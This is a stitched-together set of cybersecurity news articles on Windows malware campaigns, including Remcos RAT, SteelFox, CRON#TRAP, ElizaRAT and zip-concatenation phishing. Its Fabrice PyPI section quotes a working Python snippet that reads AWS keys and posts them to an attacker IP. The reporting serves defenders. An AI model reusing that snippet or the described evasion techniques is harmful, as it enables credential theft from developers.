**What privileges could be gained by an attacker who successfully exploited this vulnerability?**

An attacker who successfully exploited this vulnerability could gain SYSTEM privileges.

CVE-2024-43630: Windows Kernel Elevation of Privilege Vulnerability

CVE-2024-43530: Windows Update Stack Elevation of Privilege Vulnerability

Windows users are at risk for full device takeover by an emerging malicious version of the Remcos remote admin tool, which is being used in an ongoing campaign exploiting a known remote code execution (RCE) vulnerability in Microsoft Office and WordPad.

Source: imageBROKER.com GmbH & Co. KG via Alamy Stock Photo

Threat actors have given the commercially available Remcos remote access tool a new malicious makeover, wrapping its malware code in several layers of varying script languages, including JavaScript, VBScript, and PowerShell, to avoid detection and analysis and achieve full takeover of Microsoft Windows devices.

New findings from Fortinet researcher Xiaopeng Zhang warn Microsoft Windows users about a new campaign using this new-and-improved version of Remcos RAT that exploits a known remote code execution (RCE) vulnerability arising from how unpatched Microsoft Office and WordPad instances parse files.

The attack chain starts with a phishing email intended to lure users into clicking an Excel file disguised as a business order, according to the report. Once the file is activated it exploits the bug (CVE-2017-0199) and downloads the malware payload.

**Remco's New Version Is Good at Avoiding Analysis**

"Its code is wrapped in multiple layers using different script languages and encoding methods, including JavaScript, VBScript, Base64-encoded, URL-encoded, and PowerShell, to protect itself from detection and analysis," according to the researcher. "Once the downloaded exe file, dllhost.exe, starts, it extracts a batch of files into the %AppData% folder. Some of the key data are hidden in these files."

From there, the host runs a piece of heavily obfuscated PowerShell code that, importantly, works only on the 32-bit PowerShell process, the report added.

Next, the malware runs self-decryption code hidden beneath a rat's nest (pun intended) of unnecessary code to avoid analysis. But that isn't the only sophisticated evasion technique utilized by the latest version of malicious Remcos RAT. According to the report, the campaign throws up several analysis road blocks throughout the attack chain, including installing a vectored exception handler, and gaining and calling system APIs in an inconsistent, hard to track way. It also uses a tool called "ZwSetInformationThread()" to check for a debugger, the report added.

"The malicious code calls API ZwSetInformationThread() with the argument ThreadHideFromDebugger (0x11) and the current thread (0xFFFFFFFE). This mechanism in Windows can conceal a thread’s existence from debuggers," explained Zhang. "If a debugger is attached to the current process, it exits immediately once the API is called."

The malware further uses an API hooking technique to avoid detection.

"The malicious code simulates executing multiple API instructions (say, two instructions) at the beginning and then jumps to the API to execute the rest of the instructions (beginning with the 3rd instruction)," according to the report. "Whenever any ... detection conditions are triggered, the current process (PowerShell.exe) can become unresponsive, crash, or exit unexpectedly."

Once ready, the threat actors download an encrypted file with the malicious version of Remcos RAT that is run in current process's memory, effectively making this latest variant fileless, the report pointed out.

**Defend With Patching, Training, and Endpoint Protection**

"Remcos collects some basic information from the victim's device," Zhang added. "It then encrypts and sends the collected data to its C2 server to register that the victim's device is online and ready to be controlled."

Anti-analysis and tricky obfuscation techniques aside, Darren Guccione, CEO and founder of Keeper Security, noted in an emailed statement that low-tech phishing and social engineering that remain among the very most dangerous enterprise cybersecurity threats.

"Preventing these attacks requires a combination of technical defenses and employee awareness," he wrote. "Recognizing red flags, such as unusual senders, urgent requests and suspicious attachments, can help reduce human error. Regular training and robust security measures empower employees to act as the first line of defense."

Robust endpoint security should also be a priority to defend against these types of attacks, as well as a basic patch management strategy, according to a statement from Stephen Kowski, field CTO for SlashNext Email Security+.

"Protection requires a multi-faceted approach: keeping Microsoft Office fully patched, implementing advanced email security to detect and block malicious attachments in real time, and deploying modern endpoint security to identify suspicious PowerShell behaviors," Kowski commented. "Most critically, since this attack relies on social engineering through phishing emails, organizations should ensure their employees receive regular security awareness training focused on identifying suspicious attachments and purchasing order-themed lures."

Revamped Remcos RAT Deployed Against Microsoft Windows Users

Attackers abuse concatenation, a method that involves appending multiple zip archives into a single file, to deliver a variant of the SmokeLoader Trojan hidden in malicious attachments delivered via phishing

Source: Rawpixel.com via Shutterstock

Threat actors are exploiting the various ways that zip files combine multiple archives into one file as an anti-detection tactic in phishing attacks that deliver various Trojan malware strains, including SmokeLoader.

Attackers are abusing the structural flexibility of zip files through a technique known as concatenation, a method that involves appending multiple zip archives into a single file, new research from Perception Point has found. In this method, the combined file appears as one archive that actually contains multiple central directories, each pointing to different sets of file entries.

However, "this discrepancy in handling concatenated zips allows attackers to evade detection tools by hiding malicious payloads in parts of the archive that some zip readers cannot or do not access," Arthur Vaiselbuh, Windows internals engineer, and Peleg Cabra, product marketing manager from Perception Point, wrote in a recent blog post.

Abusing concatenation allows attackers to hide malware in zip files that even readers aimed at parsing the files for in-depth analysis, including 7.zip or OS-native tools, may not detect, according to Perception Point.

"Threat actors know these tools will often miss or overlook the malicious content hidden within concatenated archives, allowing them to deliver their payload undetected and target users who use a specific program to work with archives," Vaiselbuh and Cabra noted in the post.

**How to Exploit Zip Files**

To illustrate how zip files can be misused, the post breaks down the different ways that three popular zip archive readers — 7.zip, Windows File Explorer, and WinRAR — handle concatenated zip files.

7.zip, for example, will only display the contents of the first archive and then may display a warning that "there are some data after the end of the archive." However, this message often is overlooked and thus malicious files may not be detected, the researchers noted.

Windows File Explorer demonstrates different potential for malicious use as it "may fail to open the file altogether or, if renamed to .rar, will display only the 'malicious' second archive’s contents," according to the post. "In both cases, its handling of such files leaves gaps if used in a security context," Vaiselbuh and Cabra wrote.

WinRAR takes a different tack in that it actually reads the second central directory and displays the contents of the second and potentially malicious archive, making it "a unique tool in revealing the hidden payload," they added.

Ultimately, though sometimes these readers detect the malicious activity, the different ways that each reader handle concatenated files leaves room for exploit, leading to varying outcomes and potential security implications, according to Perception Point.

**Phishing Attack Vector**

The phishing attack that exploits concatenation observed by Perception Point starts with an email that purports to come from a shipping company and uses urgency to bait users. The email is marked with "High Importance" and includes an attachment, SHIPPING\_INV\_PL\_BL\_pdf.rar, sent under the guise that it's a shipping document that must be reviewed before a shipment can be completed.

The attached file appears to be a rar archive due to its .rar extension, but is actually a concatenated zip file, deliberately disguised to confuse the user not only by exploiting trust associated with rar files, but also bypassing basic detections that might rely on file extensions for initial file assessments, according to the post.

The file contains a variant of the known Trojan malware family SmokeLoader that's designed to automate malicious tasks such as downloading and executing additional payloads, which could include other types of malware, such as banking Trojans or ransomware.

However, when tested, only two of the three tools that parse zip files actually detected that there is a potentially malicious archive in the file, according to the post. Opening the attachment using 7.zip reveals only a benign-looking PDF titled "x.pdf," which appears to be an innocent shipping document. On the other hand, both Windows File Explorer or WinRAR fully expose the hidden danger.

"Both tools display the contents of the second archive, including the malicious executable SHIPPING\_INV\_PL\_BL\_pdf.exe, which is designed to run and execute the malware," Vaiselbuh and Cabra wrote.

**Mitigation of a Persistent Issue**

Perception Point security researchers contacted the developers of 7.zip to address the behavior they observed between its reader and of concatenated zip files, according to the post. However, their response did not acknowledge that it is any kind of vulnerability.

"The developer confirmed that it is not a bug and is considered intentional functionality — meaning this behavior is unlikely to change, leaving the door open for attackers to continue exploiting it," Vaiselbuh and Cabra wrote.

Given that the risk continues to exist for the observed attack vector to abuse these files in phishing attacks, users are urged to approach any email sent from an unknown entity that requires them to take immediate action by opening an unsolicited file with caution.

Enterprises also are encouraged to use advanced security tools that detect when a zip archive (or a malformed rar archive) is concatenated and recursively extract every layer. This type of analysis can ensure "that no hidden threats are missed, regardless of how deeply they are buried — deeply nested or concealed payloads are revealed for further analysis," Vaiselbuh and Cabra wrote.

**About the Author**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Flexible Structure of Zip Archives Exploited to Hide Malware Undetected

This article explains the inner workings of the Remcos RAT, a dangerous malware that uses advanced techniques to…

This article explains the inner workings of the Remcos RAT, a dangerous malware that uses advanced techniques to infect Windows systems, steal data, and gain remote control. Learn more about its attack methods, evasion tactics, and the potential impact on users.

Cybersecurity researchers at Fortinet’s FortiGuard Labs have uncovered a dangerous phishing campaign distributing a new **Remcos RAT** (Remote Access Trojan) variant. This powerful malware, sold commercially online, targets Microsoft Windows users and allows threat actors to remotely control infected computers.

Remcos RAT being sold online (Screenshot via Fortinet)

According to Fortinet’s findings, shared with Hackread.com, this campaign was initiated with a deceptive phishing email disguised as an order notification (OLE Excel document). Upon opening the attached malicious Excel document, the **CVE-2017-0199** vulnerability is exploited to download and execute an HTML Application (HTA) file.

For your information, CVE-2017-0199 is a Remote Code Execution vulnerability that exploits Microsoft Office and WordPad’s parsing of specially crafted files, allowing the **MS Excel program** to display the content.

This HTA file, crafted with multiple layers of obfuscation and its code written in different scripts, including JavaScript, VBScript, Base64-encoded, URL-encoded, and PowerShell, delivers the primary payload.

It then downloads a malicious executable (dllhost.exe) and executes it via a 32-bit PowerShell process to extract and deploy the Remcos RAT. The malware modifies the system registry to automatically launch itself upon system startup to ensure persistence.

Remcos connects to a C&C server and sends a registration packet containing system, user, network, and version information about the infected system, and receives commands for information gathering, file operations, remote execution, keylogging, screen recording, and webcam capture. 

This new variant employs multiple persistence mechanisms, including advanced anti-analysis techniques like Vectored Exception Handling. This creates a custom exception handler to intercept/handle execution exceptions preventing debugging techniques like single-stepping. 

Since it doesn’t store API names directly, Remcos uses hash values to identify APIs, extracting addresses from the Process Environment Block (PEB) by matching hash values, which makes static analysis more challenging as tools cannot easily identify the functions being called.

It also detects debuggers’ presence by checking debug registers (DR0 to DR7), monitoring API calls commonly used by debuggers, and using the ZwSetInformationThread() API to hide the current thread from debuggers. Furthermore, it uses the ZwQueryInformationProcess() API to detect if a debugger is attached to the process and take evasive actions. 

Process hollowing is another technique it uses for evading detection. Researchers found that the malware suspends a newly created legitimate process (Vaccinerende.exe), injects its code into the memory, and then resumes it, making it a persistent threat. 

Attack flow and one of the malicious emails used in the attack (Screenshot via Fortinet)

“The malicious code adds a new auto-run item to the system registry to maintain persistence and maintain control of the victim’s device when it is restarted,” researchers noted in their **report**.

To protect yourself, avoid clicking on links or attachments in emails unless they are legitimate, **use security software and antivirus software**, keep software updated with the latest patches, and consider Content Disarm and Reconstruction (CDR) service to remove embedded malicious objects from documents before opening them.

1.  **P2Pinfect Botnet Now Targets Servers with Ransomware**
2.  **ValleyRAT Hits Chinese Windows Users in Multi-Stage Attack**
3.  **Rust-Based Injector Deploys Remcos RAT in Multi-Stage Attack**
4.  **SteelFox Malware Posing as Popular Software, Steal Browser Data**
5.  **Fake OnlyFans Checker Tool Infects Hackers with Lummac Stealer**

Hackers Use Excel Files to Deliver Remcos RAT Variant on Windows

High-profile entities in India have become the target of malicious campaigns orchestrated by the Pakistan-based Transparent Tribe threat actor and a previously unknown China-nexus cyber espionage group dubbed IcePeony.
The intrusions linked to Transparent Tribe involve the use of a malware called ElizaRAT and a new stealer payload dubbed ApoloStealer on specific victims of interest, Check Point

High-profile entities in India have become the target of malicious campaigns orchestrated by the Pakistan-based Transparent Tribe threat actor and a previously unknown China-nexus cyber espionage group dubbed IcePeony.

The intrusions linked to Transparent Tribe involve the use of a malware called ElizaRAT and a new stealer payload dubbed ApoloStealer on specific victims of interest, Check Point said in a technical write-up published this week.

"ElizaRAT samples indicate a systematic abuse of cloud-based services, including Telegram, Google Drive, and Slack, to facilitate command-and-control communications," the Israeli company said.

ElizaRAT is a Windows remote access tool (RAT) that Transparent Tribe was first observed using in July 2023 as part of cyber attacks targeting Indian government sectors. Active since at least 2013, the adversary is also tracked under the names APT36, Datebug, Earth Karkaddan, Mythic Leopard, Operation C-Major, and PROJECTM.

Its malware arsenal includes tools for compromising Windows, Android, and Linux devices. The increased targeting of Linux machines is motivated by the Indian government's use of a custom Ubuntu fork called Maya OS since last year.

Infection chains are initiated by Control Panel (CPL) files likely distributed via spear-phishing techniques. As many as three distinct campaigns employing the RAT have been observed between December 2023 and August 2024, each using Slack, Google Drive, and a virtual private server (VPS) for command-and-control (C2).

ApoloStealer is designed to gather files matching several extensions (e.g., DOC, XLS, PPT, TXT, RTF, ZIP, RAR, JPG, and PNG) from the compromised host and exfiltrate them to a remote server.

In January 2024, the threat actor is said to have tweaked the modus operandi to include a dropper component that ensures the smooth functioning of ElizaRAT. Also observed in recent attacks is an additional stealer module codenamed ConnectX that's engineered to search for files from external drives, such as USBs.

The abuse of legitimate services widely used in enterprise environments heightens the threat as it complicates detection efforts and allows threat actors to blend into legitimate activities on the system.

"The progression of ElizaRAT reflects APT36's deliberate efforts to enhance their malware to better evade detection and effectively target Indian entities," Check Point said. "Introducing new payloads such as ApolloStealer marks a significant expansion of APT36's malware arsenal and suggests the group is adopting a more flexible, modular approach to payload deployment."

**IcePeony Goes After India, Mauritius, and Vietnam**

The disclosure comes weeks after the nao\_sec research team revealed an advanced persistent threat (APT) group it calls IcePeony has targeted government agencies, academic institutions, and political organizations in countries such as India, Mauritius, and Vietnam since at least 2023.

"Their attacks typically start with SQL Injection, followed by compromise via web shells and backdoors," security researchers Rintaro Koike and Shota Nakajima said. "Ultimately, they aim to steal credentials."

One of the most noteworthy tools in its malware portfolio is IceCache, which is designed to target Microsoft Internet Information Services (IIS) instances. An ELF binary written in the Go programming language, it's a custom version of the reGeorg web shell with added file transmission and command execution features.

The attacks are also characterized by the use of a unique passive-mode backdoor referred to as IceEvent that comes with capabilities to upload/download files and execute commands.

"It seems that the attackers work six days a week," the researchers noted. "While they are less active on Fridays and Saturdays, their only full day off appears to be Sunday. This investigation suggests that the attackers are not conducting these attacks as personal activities, but are instead engaging in them as part of organized, professional operations."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

IcePeony and Transparent Tribe Target Indian Entities with Cloud-Based Tools

Cybersecurity researchers have flagged a new malware campaign that infects Windows systems with a Linux virtual instance containing a backdoor capable of establishing remote access to the compromised hosts.
The "intriguing" campaign, codenamed CRON#TRAP, starts with a malicious Windows shortcut (LNK) file likely distributed in the form of a ZIP archive via a phishing email.
"What makes the CRON#

Cybersecurity researchers have flagged a new malware campaign that infects Windows systems with a Linux virtual instance containing a backdoor capable of establishing remote access to the compromised hosts.

The "intriguing" campaign, codenamed **CRON#TRAP**, starts with a malicious Windows shortcut (LNK) file likely distributed in the form of a ZIP archive via a phishing email.

"What makes the CRON#TRAP campaign particularly concerning is that the emulated Linux instance comes pre-configured with a backdoor that automatically connects to an attacker-controlled command-and-control (C2) server," Securonix researchers Den Iuzvyk and Tim Peck said in an analysis.

"This setup allows the attacker to maintain a stealthy presence on the victim's machine, staging further malicious activity within a concealed environment, making detection challenging for traditional antivirus solutions."

The phishing messages purport to be an "OneAmerica survey" that comes with a large 285MB ZIP archive that, when opened, triggers the infection process.

As part of the as-yet-unattributed attack campaign, the LNK file serves as a conduit to extract and initiate a lightweight, custom Linux environment emulated through Quick Emulator (QEMU), a legitimate, open-source virtualization tool. The virtual machine runs on Tiny Core Linux.

The shortcut subsequently launches PowerShell commands responsible for re-extracting the ZIP file and executing a hidden "start.bat" script, which, in turn, displays a fake error message to the victim to give them the impression that the survey link is no longer working.

But in the background, it sets up the QEMU virtual Linux environment referred to as PivotBox, which comes preloaded with the Chisel tunneling utility, granting remote access to the host immediately following the startup of the QEMU instance.

"The binary appears to be a pre-configured Chisel client designed to connect to a remote Command and Control (C2) server at 18.208.230\[.\]174 via websockets," the researchers said. "The attackers' approach effectively transforms this Chisel client into a full backdoor, enabling remote command and control traffic to flow in and out of the Linux environment."

The development is one of the many constantly evolving tactics that threat actors are using to target organizations and conceal malicious activity -- case in point is a spear-phishing campaign that has been observed targeting electronic manufacturing, engineering, and industrial companies in European countries to deliver the evasive GuLoader malware.

"The emails typically include order inquiries and contain an archive file attachment," Cado Security researcher Tara Gould said. "The emails are sent from various email addresses including from fake companies and compromised accounts. The emails typically hijack an existing email thread or request information about an order."

The activity, which has mainly targeted countries like Romania, Poland, Germany, and Kazakhstan, starts with a batch file present within the archive file. The batch file embeds an obfuscated PowerShell script that subsequently downloads another PowerShell script from a remote server.

The secondary PowerShell script includes functionality to allocate memory and ultimately execute the GuLoader shellcode to ultimately fetch the next-stage payload.

"Guloader malware continues to adapt its techniques to evade detection to deliver RATs," Gould said. "Threat actors are continually targeting specific industries in certain countries. Its resilience highlights the need for proactive security measures."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New CRON#TRAP Malware Infects Windows by Hiding in Linux VM to Evade Antivirus

SteelFox malware targets software pirates through fake activation tools, stealing credit card data and deploying crypto miners. Learn…

SteelFox malware targets software pirates through fake activation tools, stealing credit card data and deploying crypto miners. Learn about this new threat affecting users worldwide and how to protect yourself from this sophisticated cybercrime campaign.

Cybersecurity researchers at Securelist have identified a new type of malware that has been spreading through online forums, torrent trackers, and blogs, posing as legitimate software like Foxit PDF Editor, AutoCAD, and JetBrains.

Dubbed “SteelFox” by researchers; the malware’s main targets are those Microsft Windows users who are involved in downloading pirated software and fake software activation tools (cracks).

The campaign, which began in February 2023, combines cryptocurrency mining and data stealing capabilities through fake software activation tools. So far, the malware has infected over 11,000 users worldwide.

According to Securelist’s **blog post** shared with Hackread.com ahead of publishing, SteelFox is a full-featured _“_crimeware bundle_“_ that extracts sensitive data from infected devices, including credit card information, browsing history, and login credentials. It also collects system information, such as installed software, running services, and network configurations.

The malware’s initial attack vector involves fake software activators, which are advertised on online forums and torrent trackers as a way to activate legitimate software for free. Once installed, the malware creates a service that stays on the system, even after reboots and uses a vulnerable driver to advance its privileges.

Malicious dropper advertisement (Via Securelist)

The malware operates through a multi-stage attack chain, beginning with a dropper that requires administrator privileges. Once executed, it installs itself as a Windows service and uses AES-128 encryption to hide its components. The malware achieves system-level access by exploiting vulnerable drivers and implements TLS 1.3 with SSL pinning for secure communication with its command servers.

> _“SteelFox’s Highly sophisticated usage of modern C++ combined with external libraries grants this malware formidable power. Usage of TLSv1.3 and SSL pinning ensures secure communication and harvesting of sensitive data.”_
> 
> Securelist

****Global Impact****

SteelFox does not appear to target specific individuals or organizations, instead operating on a larger scale to infect as many users as possible. The malware has already infected users in over 10 countries, including the following:

*   **UAE**
*   **India**
*   **Brazil**
*   **China**
*   **Russia**
*   **Egypt**
*   **Algeria**
*   **Mexico**
*   **Vietnam**
*   **Sri Lanka**

James McQuiggan, a security awareness advocate at **KnowBe4**, emphasized the importance of organizations being cautious about the sources of their software downloads. He also highlighted the necessity of training employees through cybersecurity awareness programs.

“The dual functionality of SteelFox’s droppers—providing both software “cracks” and malware indicates the complex tools used by cybercriminals and using an outdated driver for privilege escalation highlights the critical need for organizations to ensure they are implementing patches.”

“Organizations must ensure they verify software sources, maintain the least user privilege access control, and leverage endpoint protection to detect suspicious installation behaviours,” James explained.

“Furthermore and more importantly, ensure that cybersecurity awareness programs are provided to users about the dangers of unverified software, like open source software or these common applications. Allow for an IT-managed software solution to install and monitor all applications,” he advised.

****Protecting Yourself from SteelFox****

To avoid becoming victims of SteelFox, users should only download software from official sources and use a **reliable security solution** that can detect and prevent the installation of infected software. Additionally, users should be cautious when clicking links or downloading attachments from unknown sources, as these can often be used to spread malware.

1.  **Winos4.0 Malware Targeting Windows via Fake Gaming Apps**
2.  **Fabrice Malware on PyPI Stealing AWS Credentials for 3 Years**
3.  **SideWinder hit Android users with malware apps on Play Store**
4.  **TodoSwift Malware Targets macOS, Disguised as Bitcoin PDF App**
5.  **Octo2 Malware Uses Fake NordVPN Apps to Infect Android Phones**

New SteelFox Malware Posing as Popular Software to Steal Browser Data

The malware combines a miner and data stealer, and it packs functions that make detection and mitigation a challenge.

Source: Wirestock Creators via Shutterstock

Thousands of people — including many using applications such as AutoCAD, JetBrains, and the Foxit PDF editor — have become victims of a sophisticated data-stealing and cryptomining malware campaign that's been active since at least February 2023.

The as-yet-unidentified threat actor behind it is distributing the malware via forum posts and illegal torrents. What makes the malware challenging to mitigate is its use of SSL pinning and TLSv1.3 encryption to protect its command-and-control (C2) communications and data exfiltration activities against interception and analysis.

Researchers at Kaspersky who discovered the malware are tracking it as "SteelFox." In a report this week, they described the threat as not targeting any user, group, or organization specifically. "Instead, it acts on a mass scale, extracting every bit of data that can be processed later," the security vendor's researchers noted. "The highly sophisticated usage of modern C++ combined with external libraries grant this malware formidable power."

More than 11,000 people appear to have fallen victim to the malware bundle, mostly across 10 countries, including Brazil, China, Russia, Mexico, and the United Arab Emirates.

The initial access in each case resulted from people acting on posts that advertised SteelFox as an efficient application activator — i.e., a tool that allows users to bypass licensing mechanisms and activate a commercial application for free. The apps that SteelFox purported to be an activator for included Foxit PDF Editor, JetBrains, and AutoCAD.

"While these droppers do have the advertised functionality, they also deliver sophisticated malware right onto the user’s computer," the researchers wrote.

**Sophisticated Execution Chain**

Kaspersky's analysis of the SteelFox activator for JetBrains showed that once it has initial access, the malware asks for administrative access to the user's system. It then uses that access to begin installing the application activator in the computer's Progra Files folder. During the process, SteelFox also drops a malicious Portable Executable file for 64-bit Windows systems (PE64). The file goes through a series of execution steps before retrieving and deploying a modified version of the XMRig coin miner with hardcoded credentials to a mining pool.

The malware then connects to its C2 server, at which point a separate data stealer component is triggered. The stealer first enumerates or determines the browsers on the victim's systems and deploys functions for stealing a range of data, including credit card data, cookies, browsing history, and a list of sites the user might have visited. Other data that Kaspersky found the stealer pilfering from compromised systems included information on all installed software, network info such as wireless interfaces and passwords, drive names and types, user information, and RDP session information.

The security vendor pointed to several mechanisms that the authors of the malware have implemented to make it hard for defenders to detect and mitigate against the threat. The initial stage executable, for instance, is encrypted, making analysis harder. The initial PE64 payload is modified, after deployment, by overwriting time stamps and inserting random junk data to avoid detection. For persistence, the second-stage payload creates a Windows service and configures it to auto start ensuring the malware remains active through system reboots. Before actual payload execution the malware launches and loads from inside a Windows service that requires privileges unavailable to most users.

"This makes any user actions against this loader impossible because even copying this sample requires NT\\SYSTEM privileges," Kaspersky said.

**A Growing Challenge for Defenders**

SteelFox's use of SSL pinning — where a client application or device uses a specific certificate or public key — and the TLSv.3 encryption protocol for C2 communication is another issue because they allow the malware to operate covertly with a low risk of detection.

"SteelFox has emerged recently, and it is a full-featured crimeware bundle. It is capable of stealing various user data that might be of interest to the actors behind this campaign," Kaspersky's researchers wrote.

SteelFox is only the latest manifestation of what security researchers have described as the growing sophistication that threat actors have begun incorporating into their malware and tactics. Another recent example is CRON#TRAP, a campaign, where a threat actor is using custom-emulated QEMU Linux environments to stage malware and execute malicious commands in near-undetectable fashion. In May, Elastic Security reported GhostEngine a multimodal malware toolkit that, among other things, has functions for effectively killing endpoint detection and response mechanisms. The proliferation and easy availability of generative AI (GenAI) tools also has fueled some of the recent innovation around malware tactics, especially in influence operations and misinformation campaigns.

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

'SteelFox' Malware Blitz Infects 11K Victims With Bundle of Pain

The malicious Python package “Fabrice” on PyPI mimics the “Fabric” library to steal AWS credentials, affecting thousands. Learn how…

The malicious Python package _“Fabrice”_ on PyPI mimics the _“Fabric”_ library to steal AWS credentials, affecting thousands. Learn how it works and protect your projects with smart security practices.

Cybersecurity researchers at Socket Security have identified a malicious Python package named “Fabrice” on the Python Package Index (PyPI), which has been actively harvesting Amazon Web Services (**AWS**) credentials from unsuspecting developers for the past three years.

This package, which mimics the legitimate and widely-used “fabric” library for SSH command execution has over 202 million downloads, the malicious version has been downloaded over 37,000 times since it surfaced in 2021.

****Typosquatting****

The malicious Fabrice package is designed to exploit the trust associated with the genuine “fabric” library. This technique is called **typosquatting** in which scammers take advantage of situations in which users mistype the name of the popular “fabric” package.

The malware includes payloads that steal credentials, install backdoors, and execute additional platform-specific scripts. The scammers behind the package are particularly interested in Amazon Web Services (AWS) credentials. Currently, the attackers are targeting users and developers on Windows and Linux devices.

****Targeting Linux and Windows Devices****

On Linux, the malware creates hidden directories within the user’s home directory to store and run scripts downloaded from a remote server. These scripts are designed to hide their activity, making detection quite difficult.

On Windows, it uses VBScript to run hidden Python scripts, which in turn download malicious executables. These executables are then scheduled to run repeatedly, assuring persistence on the infected system. The malware also attempts to delete its initial entry point to cover its tracks.

****Stolen Credentials Sent to Paris****

In its **report** shared with Hackread.com ahead of publishing, both methods lead to the extraction of AWS credentials, sending them to a server located in Paris, operated by M247, a VPN service provider. This could allow attackers to abuse these credentials for unauthorized access to cloud resources. What’s worse, the campaign remains active despite researchers’ alerts to PyPI.

****Example of AWS Credential Exfiltration****

session = boto3.Session()  
cd = session.get_credentials()  
ak = cd.access_key  
sk = cd.secret_key  
data = {"k": ak, "s": sk}  
muri = "ht"+"tp"+":"+"//89.44.9.227/akkfuifkeifsa"  
requests.post(muri, json=data, timeout=4

> _“Recognizing the severe risk fabrice poses, our team has proactively reported it to the PyPI team for takedown to safeguard the broader developer community. It is still live at the time of publishing.”_
> 
> Socket Security

Rom Carmel, Co-Founder and CEO of Identity Security platform **Apono** weighed in on the latest development stating, _“_Malicious actors continue to find success by putting malicious software packages out into the developer community, playing a numbers game that a percentage of developers will make the very human mistake of choosing the wrong package for their code._“_

_“_While methods like improving security awareness education and implementing processes for secure coding can go a long way in helping developers to make more secure decisions as we see with phishing, security teams need to take steps to secure their organizations from an assumed breach approach,_“_ Rom warned.

_“_To protect your organization once credentials are compromised as we see on a near daily basis, we need to think in terms of defence in depth. That means implementing not only MFA but also reducing the blast radius from an account takeover in terms of the availability of access and the scope of privileges that attackers can use,_“_ he advised.

****Additional Security Measures for Developers****

Developers are the backbone of any project. The information that can be extracted from them can become a treasure trove if it falls into the wrong hands. Lately, **Python developers, in particular**, have been heavily targeted by threat actors. Here are some tips to protect your data and accounts from hackers and malware attacks:

*   **Stay Informed**: Keep yourself up-to-date about security advisories from platforms like PyPI. Community reports and security research blogs can be valuable in staying protected against threats like Fabrice.
*   **Double-check for typosquatting:** Always double-check the names of packages before installation. Look for signs of typosquatting like slight misspellings or unusual publisher names.
*   **Use Security Tools**: Employ tools like Socket for GitHub, which provides real-time monitoring and security checks for dependencies in your projects. Such tools can automatically detect and alert suspicious activities or known malicious packages.
*   **Regular Security Audits**: Regularly review and audit the software dependencies of your projects. Make sure that all packages are from trusted sources and serve a legitimate purpose.
*   **Follow Hackread.com:** Most importantly, follow Hackread.com.

1.  **Why is learning Python important in Data Science?**
2.  **6 official Python repositories plagued with cryptomining malware**
3.  **PythonAnywhere Cloud Platform Abused for Hosting Ransomware**
4.  **NTLM Credential Theft in Python Apps Threaten Windows Security**
5.  **Python in Threat Intelligence: Analyzing – Mitigating Cyber Threats**

Tag

#windows